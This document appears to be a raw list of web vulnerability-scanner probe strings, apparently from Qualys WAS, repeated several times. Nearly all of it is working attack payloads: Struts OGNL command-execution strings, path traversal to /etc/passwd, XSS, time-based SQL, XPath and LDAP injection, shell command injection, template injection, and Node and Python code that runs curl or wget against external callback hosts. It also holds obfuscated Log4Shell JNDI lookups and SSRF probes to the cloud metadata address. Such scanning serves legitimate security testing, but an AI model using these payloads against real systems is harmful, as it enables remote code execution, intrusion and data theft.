%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
1
(
1
,
``
1
1
/*
1
#
1
;--
1
1'
1
qualyswasesi
q Qualys_resp_hdr_injection: Vulnerable
1
1
q Qualys_resp_hdr_injection: Vulnerable
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
1
< script a=4>qssTCtFN8lJ=7< /script>
1
" onEvent=X161733060Y1_2Z
1
' onEvent=X161733060Y1_2Z
1
"'>
1
BODY{background:url("javascript:qss94N9ivV0=7")}
1
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(Rn9cHDG5)
1
_q=random(X161733060Y1_2Z)
1
_q=random(X161733060Y1_2Z)
1
"'>
1
z-->
1
1"'>
">
1
1
javascript:qxss(X161733060Y1_2Z);
1
" onEvent=X161733060Y1_2Z
1
' onEvent=X161733060Y1_2Z
1
_q=random(X161733060Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1' + sleep(29*100*Math.sqrt(100)) + '
1
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1
1 or true() or 'and' = 'and'
1
1
1
1' or not(false()) or 'true' = 'true
1' and false() and 'or' = 'and
1' or true() or 'and' = 'and
1
1
15 oR 9=8 + 1
1
11 or 11=12
11 or 11=11
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1' and 'tpklq'='xqlkp
1
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1
1') and 'swqtp'='ptqws
1') or 'swqtp'='swqtp
1
1
1 aND 7248=2491 + 4757
1
1 and 7248 IS NULL
1 and NULL IS NULL
1
1 oR 6248=2491 + 3757
1
1
1 or 6248 IS NULL
1 or NULL IS NULL
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1
1 and 4325=2728 --
1 or 4325=4325 --
1
1
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1' and 3789=1391 --
1' or 3789=3789 --
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl 233fc4b11c987c59b14b9f22daa8e6524b984162.17414239393642422.687986010.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget 4e39e6a5aabd45c19d3ddef6be57a42658bf50fb.17414239393642422.1788365057.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 1ffa80387dd5915a14dfe163248eebbc03ed72df.17414239393642422.1940405259.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 31abd99331a30c72a1e04acbcbc43f177f082ffc.17414239393642422.220294433.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 33e2d1de457dc947cf98d00ac018ec30cbc0ef58.17414239393642422.1462547719.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","6d4fbc9616d72fc13158f19ce571e82d84907557.17414239393642422.210185637.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://c42afc797897537f9587a591e96606a18f8f5c49.17414239393642422.2351549892.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://2b071fc88776846f8b10901570145918ca918680.17414239393642422.2595940560.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//9d8a777ccaa2579f6400898c4e254ddb19aea3c6.17414239393642422.1347580885.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://249dca7a46e82d2cfc7f367c346b8199553db27d.17414239393642422.2039665528.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//0dbfaf8de2252194278d8af3a4ed37f76e9ab1d9.17414239393642422.4218967135.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://233a56f843c5ca2d1e509ff20b5442d78bcd238f.17414239393642422.1933132890.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//845cbce6a64c6f39bb71fbafc1155240e03d8bc7.17414239393642422.3206029122.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://6e2a4db22611c024838a84abe4ab1e8e618cc0c8.17414239393642422.1388695153.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://37d027235d23eeaefffca5cab3f65cb0618f3178.17414239393642422.3272792185.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://f5a906bb3773ea1ea12da84da5fd65a1501a024e.17414239393642422.4258335415.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://09811d7dd14a2d7829e69b1dfdb61a3a1f9f0929.17414239393642422.785876154.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
2bb4e35f5321992e2f41f139c8e31afbffccca39.17414239393642422.3606887439.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://764042d7066a11d93547beef462ea9d2b08e1bea.17414239393642422.4259174187.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@21baaec7b5482e5e246512e3d7c239e8d7b84dc8.17414239393642422.1228455659.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxss3SCTJQk3};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssNnE1qTe8()-"
1
'-qxss7N8Y6hh0()-'
1
*/;(function(){qxss9dSHg34A});/*
1
9 ;(function(){qxssMzvY8eqL});//
1
9;(function(){qxssW5nsh697});//
1
';(function(){qxssOqnn8r8i});/**/'
1
qualys(aqxssx6521pa5)xyz
1
");(function(){qxssIzMQYUR6});/**/"
1
";(function(){qxssBKyhN767});/**/"
1
javascript:qxss(X2982817340Y1_2Z);
http://rfitest/
1
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
1
;--
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qssRHx0tul0=7< /script>
1
" onEvent=X2982817340Y1_2Z
1
' onEvent=X2982817340Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qsstj2499Y1=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(T5fiHj9o)
_q=random(X2982817340Y1_2Z)
1
1
_q=random(X2982817340Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X2982817340Y1_2Z);
1
" onEvent=X2982817340Y1_2Z
1
' onEvent=X2982817340Y1_2Z
1
_q=random(X2982817340Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1' or true() or 'and' = 'and
1
1
15 oR 9=8 + 1
1
11 or 11=12
11 or 11=11
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1
1' and 'tpklq'='xqlkp
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1
1') and 'swqtp'='ptqws
1') or 'swqtp'='swqtp
1
1 aND 7248=2491 + 4757
1
1
1 and 7248 IS NULL
1 and NULL IS NULL
1
1 oR 6248=2491 + 3757
1
1 or 6248 IS NULL
1
1 or NULL IS NULL
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1
1 and 4325=2728 --
1 or 4325=4325 --
1
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1' and 3789=1391 --
1' or 3789=3789 --
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl 819e9a29f21b1e8a6f10cff93dcc65d9a9ef5b00.17392059393642422.3171064133.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget a64e64c9c945cba315ea0aeb0a4f2bbb38f598c5.17392059393642422.2295875333.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl f9126a6d03c982f06180f16231c788c768f457a7.17392059393642422.2686270213.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl b126de0ceeac5a4e086ee123689f8bd8e1dc3e82.17392059393642422.1493153063.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl b3b7f862402d1edcc3a27ea98dcc0652f7bfe6f6.17392059393642422.4253655101.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","a373bdb5381369be5a8175b4904182410a19efc6.17392059393642422.4027487773.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://7f8fe716f43c416cc4d21e324d1a09c61c42529f.17392059393642422.2912613248.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://14d2b1b48753d9263f9b2ff8b2c4864d026ca948.17392059393642422.1960082695.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//970157814b878e6678b9ce6b60ba216c60133316.17392059393642422.1032697538.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://a2e53ae480d90a60667ec8de947c799dc7500478.17392059393642422.595976103.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//919cea39926d7d4440d2663f1c781c5b8bc97430.17392059393642422.4002860512.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://34c8cfb7bc93fe2de531a84643cfbed75a23c66f.17392059393642422.1837687482.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//7e217d4a64af8f5578235373703e8b0324b9dec4.17392059393642422.827925400.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://2438c49e29459fc560c0da9a13351fc2badb726a.17392059393642422.2024779831.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://2c876e374828e9045c2ed10dff1a7a5a96ad1478.17392059393642422.3351259355.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://8aa135e3d34b2024b78e3d2df37c2e123be1acf1.17392059393642422.319578964.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://c0afc3ee6d15ed9233eb8dac39d7319f39381d5c.17392059393642422.3992320851.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
0d329394914b3053be1e8fca3b7f92e00e15764d.17392059393642422.3744830494.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://7ab00a3b2786380c0ebef69e356ee8c9c121987d.17392059393642422.2569058416.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@3115c9266fe2e00aef9c0d36ac9e3609502c0208.17392059393642422.1224598528.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxss1W4x5878};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxsscmt57SMQ()-"
1
'-qxssOn15se5Y()-'
1
*/;(function(){qxssrcY1cntv});/*
1
9 ;(function(){qxssHyD84t8C});//
1
9;(function(){qxss6Ps70QTm});//
1
';(function(){qxss3MC7MDM7});/**/'
1
qualys(aqxss88qs59r6)xyz
1
");(function(){qxsssP15ITLz});/**/"
1
";(function(){qxssio1uWfT0});/**/"
1
javascript:qxss(X157184508Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
../../../../../../../Windows/System32/drivers/etc/hosts
1
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
1
;--
1
1'
qualyswasesi
1
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
1
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qssskDpOSL9=7< /script>
1
" onEvent=X157184508Y1_2Z
1
' onEvent=X157184508Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qssaZ8p21YR=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(U7829yfy)
1
_q=random(X157184508Y1_2Z)
1
_q=random(X157184508Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X157184508Y1_2Z);
1
" onEvent=X157184508Y1_2Z
' onEvent=X157184508Y1_2Z
1
1
_q=random(X157184508Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
